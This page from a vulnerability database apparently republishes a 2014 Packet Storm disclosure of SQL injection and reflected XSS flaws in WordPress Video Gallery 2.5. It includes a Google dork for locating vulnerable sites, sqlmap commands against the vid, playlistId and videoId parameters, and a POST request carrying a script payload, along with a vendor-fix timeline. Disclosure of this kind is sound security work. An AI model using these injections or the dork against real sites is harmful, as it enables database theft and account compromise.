Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WordPress Video Gallery 2.5 Cross Site Scripting / SQL Injection

🗓️ 24 Jul 2014 00:00:00Reported by Claudio VivianiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 24 Views

WordPress Video Gallery 2.5 SQL Injection and XSS Vulnerabilities on Windows and Linu

Code
`Wordpress Video Gallery  
  
######################  
# Exploit Title : Wordpress Video Gallery 2.5 SQL Injection and XSS Vulnerabilities  
  
# Exploit Author : Claudio Viviani  
  
# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery  
  
# Software Link : http://downloads.wordpress.org/plugin/contus-video-gallery.2.5.zip ( Fixed :\ )  
  
# Dork Google: inurl:/contus-video-gallery/hdflvplayer/hdplayer.swf  
(Click on "Repeat the search with the omitted results included")  
  
# Date : 2014-07-15  
  
# Tested on : Windows 7 / Mozilla Firefox  
Windows 7 / sqlmap (0.8-1)  
Linux / Mozilla Firefox  
Linux / sqlmap 1.0-dev-5b2ded0  
  
######################  
  
# Vulnerability Disclosure Timeline:  
  
2014-07-15: Discovered vulnerability  
2014-07-16: Vendor Notification (Support e-mail address)  
2014-07-17: Vendor Response/Feedback   
2014-07-23: Vendor Fix/Patch (same version number 2.5)   
2014-07-24: Public Disclosure   
  
# Description  
  
Wordpress Video Gallery 2.5 suffers from SQL injection and Cross Site Script vulnerabilities  
  
  
######################  
  
# PoC  
  
# Vulnerablity n°1:  
  
# SQL Injection 1 (Authentication NOT Required):  
  
1) Open the browser and connect to url http://VICTIM/wp-content/plugins/contus-video-gallery/myextractXML.php  
  
2) Copy a video_id number (ex. video_id="1")  
  
3) sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=myextractXML&vid=1" -p vid  
  
  
[21:02:40] [INFO] GET parameter 'vid' is 'AND boolean-based blind - WHERE or HAVING clause' injectable   
...  
...  
...  
[21:03:34] [INFO] GET parameter 'vid' is 'MySQL > 5.0.11 AND time-based blind' injectable   
  
  
# SQL Injection 2 (Authentication Required):  
  
sqlmap --cookie="INSER_WORDPRESS_COOKIE_HERE" -u "http://VICTIM/wp-admin/admin.php?page=newplaylist&playlistId=1" -p playlistId  
  
sqlmap --cookie="INSER_WORDPRESS_COOKIE_HERE" -u "http://VICTIM/wp-admin/admin.php?page=newvideo&videoId=1" -p videoId  
  
######################  
  
# Vulnerablity n°2:  
  
# XSS Reflected Authenticated (/videoads/videoads.php, /video/video.php, /playlist/playlist.php )  
  
# PoC:  
  
POST  
Host=VICTIM  
User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0  
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding=gzip, deflate  
Referer=http://VICTIM/wp-admin/admin.php?page=videoads  
Cookie=wordpress_b43b255bc018ee66673cd91980a723bf=usertest%7C1405626269%7Ce1559aa048ec23f2ddbb5a40290a3d2e; wp-settings-1=advImgDetails%3Dshow%26libraryContent%3Dupload%26wpfb_adv_uploader%3D1%26editor%3Dtinymce%26uploader%3D1; wp-settings-time-1=1405118515; bLicense54=true; __utma=86855576.2039073811.1404413871.1404413871.1404416567.2; __utmz=86855576.1404413871.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_fid=6EEA54B2DFA4150F-06C135149F70F3D9; wp-settings-time-2=1405287261; wp-settings-2=mfold%3Do%26libraryContent%3Dupload; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-AssetAdmin=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; redux_current_tab=0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_b43b255bc018ee66673cd91980a723bf=usertest%7C1405626269%7Cd8c8ffae7aa7720d4fb3cb56537b1ea7  
Connection=keep-alive  
Content-Type=application/x-www-form-urlencoded  
Content-Length=110  
POSTDATA=videoadssearchQuery=<script>alert(1)</script>&page=videoads&videoadsearchbtn=Search+Video+Ads  
  
  
#####################  
  
Discovered By : Claudio Viviani  
http://www.homelab.it  
[email protected]  
[email protected]  
  
https://www.facebook.com/homelabit  
https://twitter.com/homelabit  
https://plus.google.com/+HomelabIt1/  
  
#####################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
24 Jul 2014 00:00Current
0.3Low risk
Vulners AI Score0.3
wordpress video gallerysql injectioncross site scriptingvulnerability disclosurepocvendor notificationvendor responsevendor fixpublic disclosurewindows 7linuxmozilla firefoxclaudio vivianifacebooktwitter
24